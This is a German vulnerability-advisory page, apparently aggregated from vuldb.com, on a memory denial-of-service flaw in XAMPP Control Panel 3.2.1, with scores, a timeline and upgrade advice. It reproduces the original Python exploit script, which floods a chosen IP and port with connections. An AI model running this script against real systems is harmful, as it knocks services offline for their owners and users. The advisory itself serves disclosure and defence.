🪟 Windows TippsBitLocker stuck on Decrypting or Encrypting in Windows 11(17.09.2026 um 00:29 Uhr)
🕵️ SicherheitslückenCVE-2026-69110 | Microck opencode-studio up to 2.4.3 missing authentication(17.09.2026 um 03:21 Uhr)
🪟 Windows TippsBitLocker stuck on Decrypting or Encrypting in Windows 11(17.09.2026 um 00:29 Uhr)
🕵️ SicherheitslückenCVE-2026-69110 | Microck opencode-studio up to 2.4.3 missing authentication(17.09.2026 um 03:21 Uhr)
🕵️ Sicherheitslücken 🕛 vor 9 Jahren 2 Min Lesezeit
0

XAMPP Control Panel 3.2.1 Memory Denial of Service

↗ Quelle (vuldb.com)
🗣️ Stimme:
📑 Inhaltsübersicht

Es wurde eine problematische Schwachstelle in XAMPP Control Panel 3.2.1 gefunden. Dabei betrifft es eine unbekannte Funktion. Mittels Manipulieren mit einer unbekannten Eingabe kann eine Denial of Service-Schwachstelle (Memory) ausgenutzt werden. Die Auswirkungen sind bekannt für Vertraulichkeit, Integrität und Verfügbarkeit.

Die Schwachstelle wurde am 24.12.2016 durch John Page (hyp3rlinx) als XAMPP Control Panel Memory Corruption Denial Of Service in Form eines bestätigten Mailinglist Posts (Bugtraq) publiziert. Das Advisory kann von bereitgestellt. Vor einer Veröffentlichung handelte es sich 51 Tage um eine Zero-Day Schwachstelle. Während dieser Zeit erzielte er wohl etwa $0-$5k auf dem Schwarzmarkt. Der durch den Exploit genutzte Code gestaltet sich wie folgt:

import socket

print "XAMPP Control Panel DOS"
print "Discovery: John Page (hyp3rlinx)"
print "ApparitionSec"
print "hyp3rlinx.altervista.org\r\n"

IP = raw_input("[IP]> ")
PORT = raw_input("[PORT]> ")

arr=[]
c=0
while 1:
try:
arr.append(socket.create_connection((IP,PORT)))
arr[c].send("DOOM")
print "Die!"
c+=1
except socket.error:
print "[+] Done! "
raw_input()
break

Ein Aktualisieren vermag dieses Problem zu lösen. Das Erscheinen einer Gegenmassnahme geschah vor und nicht erst nach der Veröffentlichung der Schwachstelle. XAMPP hat nachweislich vorgängig gehandelt.

Video

Vimeo:
Temp Score: ≈5.7
Zuverlässigkeit: Medium

CVSSv2

Base Score: ≈6.0 (CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P)
Zuverlässigkeit: Medium

CPE



  • Aktuelle Preisschätzung: $0-$5k (0-day) / $0-$5k (Heute)

    Gegenmassnahmen

    Empfehlung: Upgrade
    Status: Offizieller Fix
    Reaction Time: 51 Tage seit gemeldet
    0-Day Time: 51 Tage seit gefunden
    Exploit Delay Time: 0 Tage seit bekannt

    Timeline

    01.11.2016 Hersteller informiert
    04.11.2016 Hersteller bestätigt
    22.12.2016 Gegenmassnahme veröffentlicht
    24.12.2016
    26.12.2016

    Quellen

    Advisory: XAMPP Control Panel Memory Corruption Denial Of Service
    Person: John Page (hyp3rlinx)
    Status: Bestätigt
    Koordiniert: Ja

    Eintrag

    Erstellt: 26.12.2016
    Eintrag: 76% komplett
    Vollständiger Original-Artikel
    Den kompletten Beitrag mit allen Details direkt auf vuldb.com lesen.
    ↗ Original-Artikel auf vuldb.com lesen
Wie bewertest du diesen Beitrag?
1 Klick Feedback
Teilen mit Netzwerk & Team:

Community-Analysen & Experten-Meinungen 0

Verfasse deine eigene Analyse, teile Workarounds oder diskutiere diesen Vorfall im Blog.
Noch keine Community-Analyse verfasst. Markiere einen Textabschnitt oder klicke oben auf Eigene Analyse verfassen“!
Community Pulse: Relevanz-Einschätzung
1 Klick Experten-Votum
🔴 Akute Relevanz 0%
🟡 In Evaluierung 0%
🟢 Keine Auswirkung 0%
Spannende Innovation 0%
Verwandte Story-Cluster & Quellen (Vektor-KI)
Port 8095 Engine
2 Quellen
CVE-2026-92597 | Nodemailer up to 9.0.x Addressparser lib/addressparser input validation (EUVD-2026-81297)
1 Quelle
BitLocker stuck on Decrypting or Encrypting in Windows 11
1 Quelle
CVE-2026-92599 | hapijs joi up to 17.13.6/18.0.0-18.2.5 isoDate Joi.string.isoDate redos (EUVD-2026-81299)